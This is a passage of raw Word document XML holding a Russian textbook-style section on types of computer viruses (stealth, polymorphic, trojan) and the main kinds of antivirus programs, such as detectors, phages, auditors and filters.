        <w:t xml:space="preserve">которые распространяются по компьютерным сетям, вычисляют адреса сетевых компьютеров и записывают по этим адресам свои копии. Известны </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вирусы-невидимки, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">называемые </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">стелс-вирусами, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">которые очень трудно обнаружить и обезвредить, так как они перехватывают обращения операционной системы к пораженным файлам и секторам дисков и подставляют вместо своего тела незараженные участки диска. Наиболее трудно обнаружить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вирусы-мутанты</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, содержащие алгоритмы шифровки-расшифровки, благодаря которым копии одн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>го и того же вируса не имеют ни одной повторяющейся цепочки байтов. Им</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ются и так называемые квазивирусные или </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">"троянские" </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>программы, которые хотя и не способны к самораспространению, но очень опасны, так как, маск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>руясь под полезную программу, разрушают загрузочный сектор и файловую систему дисков.</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rPr>
        <w:t>ПРОГРАММЫ ОБНАРУЖЕНИЯ И ЗАЩИТЫ ОТ ВИРУСОВ</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Характеристика антивирусных программ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Для обнаружения, удаления и защиты от компьютерных вирусов разраб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>тано несколько видов специальных программ, которые позволяют обнаруж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">вать и уничтожать вирусы. Такие программы называются </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>антивирусными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Различают следующие виды антивирусных программ (рис. 2):</w:t>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15"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-детекторы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-доктора или фаги;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-ревизоры;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-фильтры;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-вакцины или иммунизаторы.</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noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4663440" cy="937260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="Рисунок 15" descr="http://nashaucheba.ru/docs/14/13139/conv_1/file1_html_m139eee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nashaucheba.ru/docs/14/13139/conv_1/file1_html_m139eeedf.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63440" cy="937260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Виды антивирусных программ</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iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программы-детекторы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>осуществляют поиск характерной для конкретного вируса последовательности байтов (сигнатуры вируса) в оперативной памяти и в файлах и при обнаружении выдают соответствующее сообщение. Недоста</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ком таких антивирусных программ является то, что они могут находить только те вирусы, которые известны разработчикам таких программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программы-доктора </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">фаги, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">а также </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программы-вакцины </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>не только находят зараженные вирусами файлы, но и "лечат" их, т.е. удаляют из файла тело программы вируса, возвращая файлы в исходное состояние. В начале св</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ей работы фаги ищут вирусы в оперативной памяти, уничтожая их, и только з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">тем переходят к "лечению" файлов. Среди фагов выделяют </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">полифаги, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>т.е. пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>граммы-доктора, предназначенные для поиска и уничтожения большого кол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">чества вирусов. Наиболее известными полифагами являются программы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest, Scan, Norton AntiVirus </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Doctor Web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Учитывая, что постоянно появляются новые вирусы, программы-детекторы и программы-доктора быстро устаревают, и требуется регулярное обновление их версий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программы-ревизоры </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>относятся к самым надежным средствам защиты от вирусов. Ревизоры запоминают исходное состояние программ, каталогов и с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>стемных областей диска тогда, когда компьютер не заражен вирусом, а затем периодически или по желанию пользователя сравнивают текущее состояние с и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ходным. Обнаруженные изменения выводятся на экран видеомонитора. Как правило, сравнение состояний производят сразу после загрузки операционной системы. При сравнении проверяются длина файла, код циклического контроля (контрольная сумма файла), дата и время модификации, другие параметры. Программы-ревизоры имеют достаточно развитые алгоритмы, обнаруживают стелс-вирусы и могут даже отличить изменения версии проверяемой програ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>мы от изменений, внесенных вирусом. К числу программ-</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ревизоров относится широко распространенная в России программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>фирмы "Диалог-Наука".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программы-фильтры </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">"сторожа" </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>представляют собой небольшие р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>зидентные программы, предназначенные для обнаружения подозрительных действий при работе компьютера, характерных для вирусов. Такими действи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ми могут являться:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- попытки коррекции файлов с расширениями СОМ и ЕХЕ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изменение атрибутов файлов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>прямая запись на диск по абсолютному адресу;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>запись в загрузочные сектора диска;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>загрузка резидентной программы.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>При попытке какой-либо программы произвести указанные действия "сторож" посылает пользователю сообщение и предлагает запретить или ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>решить соответствующее действие. Программы-фильтры весьма полезны, так как способны обнаружить вирус на самой ранней стадии его существования до размножения. Однако они не "лечат" файлы и диски. Для уничтожения вирусов требуется применить другие программы, например фаги. К недостаткам пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">грамм-сторожей можно отнести их "назойливость" (например, они постоянно выдают предупреждение о любой попытке копирования исполняемого файла), а также возможные конфликты с другим программным обеспечением. Примером программы-фильтра является программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
